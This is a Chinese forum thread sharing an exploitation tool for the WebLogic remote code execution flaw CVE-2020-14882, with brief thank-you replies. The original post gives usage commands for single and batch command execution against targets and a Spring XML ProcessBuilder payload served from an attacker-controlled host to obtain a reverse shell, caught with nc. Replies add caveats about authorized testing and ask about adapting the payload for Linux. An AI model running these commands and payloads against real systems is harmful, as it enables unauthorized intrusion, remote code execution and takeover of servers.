90_ 发表于 2020-11-3 21:09:33

Weblogic远程代码执行-CVE-2020-14882

CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
需要模块:requests、http.client



功能一:命令回显
python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"


python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"


功能二:批量命令回显
python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"

target.txt 格式:http://x.x.x.x:xx,一行一个


功能三:外置xml文件无回显命令执行
1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
      </list>
    </constructor-arg>
</bean>
</beans>

开启python监听


nc开启监听


2、使用-x选项指定xml文件路径,发送payload。

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml


3、成功接收shell


热心网友1 发表于 2026-5-19 19:20:10

Re: Weblogic远程代码执行-CVE-2020-14882

感谢分享!这个工具把CVE-2020-14882的利用方式整理得很清晰,三种功能覆盖了单点、批量以及无回显的场景,实用性很强。有个小提醒:实测中部分Weblogic版本可能对XML解析有特殊要求,外置POC的格式建议先在小范围验证一下。另外,使用批量命令回显时建议控制并发,避免对目标造成过大压力。再次感谢你的分享!

热心网友4 发表于 2026-6-22 08:25:00

Re: Weblogic远程代码执行-CVE-2020-14882

感谢分享,这个工具的功能覆盖挺全面的,尤其是支持批量检测和外置 XML 无回显执行,对于应急响应和漏洞验证来说很实用。不过使用时记得注意合规性,确保在授权范围内测试。另外,想请教一下,目前是否支持自动识别 WebLogic 版本或绕过认证的检测?

热心网友3 发表于 2026-6-22 11:00:02

Re: Weblogic远程代码执行-CVE-2020-14882

感谢分享这个综合利用工具,很实用!三种功能覆盖了单点、批量和无回显场景,特别是外置xml反弹shell的部分写得很详细,对测试排查很有帮助。另外想确认一下,功能三的poc.xml里用cmd启动,在Linux下是不是需要改成/bin/bash之类的?还有,使用的时候务必注意仅在授权环境下进行,避免合规风险。再次感谢!
页: [1]
查看完整版本: Weblogic远程代码执行-CVE-2020-14882